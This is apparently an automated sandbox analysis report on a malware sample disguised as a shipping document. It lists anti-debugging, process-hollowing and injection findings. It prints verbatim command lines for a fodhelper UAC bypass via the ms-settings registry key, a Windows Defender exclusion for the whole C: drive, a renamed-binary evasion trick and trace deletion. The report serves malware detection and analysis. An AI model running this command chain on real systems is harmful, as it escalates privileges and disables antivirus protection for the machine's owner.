Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_401060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_401060E2

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\Public\ger.exe

Code function: 16_2_00007FF7E0A3A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle,

16_2_00007FF7E0A3A29C

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

36_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_279567B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

0_2_279567B9

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_40104AB4 mov eax, dword ptr fs:[00000030h]		0_2_40104AB4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279832B5 mov eax, dword ptr fs:[00000030h]		0_2_279832B5

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_4010724E GetProcessHeap,

0_2_4010724E

Enables debug privileges

Source: C:\Users\Public\xkn.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_401060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_401060E2
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_40102639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_40102639
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_40102B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_40102B1C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27974FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_27974FDC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2797BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_2797BB22
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27974B47 SetUnhandledExceptionFilter,	0_2_27974B47
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_279749F9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279749F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_279749F8
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	1_2_004098D0
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004098F0 SetUnhandledExceptionFilter,	1_2_004098F0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	5_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	6_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	9_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00007FF70CC88FA4
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A3ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FF7E0A3ED50
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A3F050 SetUnhandledExceptionFilter,	16_2_00007FF7E0A3F050
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF98CCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00007FF6FEF98CCC
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF989F0 SetUnhandledExceptionFilter,	17_2_00007FF6FEF989F0
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	31_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	32_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_00007FF70CC88FA4
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC893B0 SetUnhandledExceptionFilter,	34_2_00007FF70CC893B0
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_00007FF70CC88FA4

Source: C:\Users\Public\xkn.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Memory allocated: C:\Users\Public\Libraries\glrkszlG.pif base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Memory allocated: C:\Users\Public\Libraries\glrkszlG.pif base: 1E0C0000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_279580EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

0_2_279580EF

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: NULL target: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: NULL target: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: NULL target: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe protection: execute and read and write	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Section unmapped: C:\Users\Public\Libraries\glrkszlG.pif base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Memory written: C:\Users\Public\Libraries\glrkszlG.pif base: 31C008

Jump to behavior

Contains functionality to simulate mouse events

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_27959627 mouse_event,

0_2_27959627

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\Public\Libraries\glrkszlG.pif C:\Users\Public\Libraries\glrkszlG.pif	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\agyqwjporhwhb"	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\cidbxbaqfqomdosx"	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\mcrtxutjtygzocojvhg"	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2

Uses taskkill to terminate processes

Source: C:\Users\Public\alpha.exe

Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "	Jump to behavior

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114355115.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114355115.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerD
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114261352.0000000027502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_40102933 cpuid

0_2_40102933

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: EnumSystemLocalesW,	0_2_27991F9B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: EnumSystemLocalesW,	0_2_27991F50
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_27992610
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetLocaleInfoW,	0_2_27992543
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_27991CD8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: EnumSystemLocalesW,	0_2_27988404
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_2799243C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetLocaleInfoW,	0_2_27992313
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetLocaleInfoW,	0_2_279888ED
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: EnumSystemLocalesW,	0_2_27992036
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: GetLocaleInfoA,	0_2_2794F8D1
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	5_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	5_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	5_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	6_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	6_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	6_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	9_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	9_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	9_2_00007FF70CC76EE4
